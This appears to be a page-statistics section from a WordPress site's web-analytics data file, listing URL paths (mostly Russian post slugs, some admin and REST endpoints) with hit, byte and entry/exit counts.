/%d1%81-%d0%bc%d0%b5%d0%b6%d0%b4%d1%83%d0%bd%d0%b0%d1%80%d0%be%d0%b4%d0%bd%d1%8b%d0%bc-%d0%b4%d0%bd%d0%b5%d0%bc-%d0%b2%d1%80%d0%b0%d1%87%d0%b0/ 1 33406 0 0
/author/natalyo/ 1 38749 0 0
/wp-admin/edit.php 34 4525842 0 0
/%D0%B4%D0%B5%D0%BD%D0%B5%D0%B6%D0%BD%D0%B0%D1%8F-%D0%BA%D0%BE%D0%BC%D0%BF%D0%B5%D0%BD%D1%81%D0%B0%D1%86%D0%B8%D1%8F-%D0%B7%D0%B0-%D0%BD%D0%B0%D0%B5%D0%BC-%D0%BF%D0%BE%D0%B4%D0%BD%D0%B0%D0%B5%D0%BC/ 3 115509 2 1
/index.php 1 49731 1 1
/1159-2/ 7 253955 1 2
/%d1%81%d0%be%d1%81%d1%82%d0%b0%d0%b2-%d1%81%d0%be%d0%b2%d0%b5%d1%82%d0%b0-%d0%bc%d0%be%d0%bb%d0%be%d0%b4%d0%b5%d0%b6%d0%b8-%d0%bc%d1%80%d0%bd%d1%86/ 3 93626 0 0
/%d0%b4%d0%b5%d0%bd%d0%b5%d0%b6%d0%bd%d0%b0%d1%8f-%d0%ba%d0%be%d0%bc%d0%bf%d0%b5%d0%bd%d1%81%d0%b0%d1%86%d0%b8%d1%8f-%d0%b7%d0%b0-%d0%bd%d0%b0%d0%b5%d0%bc-%d0%bf%d0%be%d0%b4%d0%bd%d0%b0%d0%b5%d0%bc/ 2 76979 0 1
/wp-json/wp/v2/users/ 17 44387 0 17
/2019/01/ 1 33943 0 0
/category/%d0%bf%d1%80%d0%be%d1%84%d0%ba%d0%be%d0%bc/page/2/ 2 79044 0 0
/page/7/ 2 81994 1 0
/%D0%BF%D0%BE%D0%BB%D0%BE%D0%B6%D0%B5%D0%BD%D0%B8%D0%B5-%D0%BE%D0%B1-%D0%BE%D0%B7%D0%B4%D0%BE%D1%80%D0%BE%D0%B2%D0%BB%D0%B5%D0%BD%D0%B8%D0%B8-%D0%B8-%D0%BE%D1%82%D0%B4%D1%8B%D1%85%D0%B5-%D1%87%D0%BB/ 2 80902 2 1
/wp-admin/update-core.php 8 358294 0 0
END_SIDER
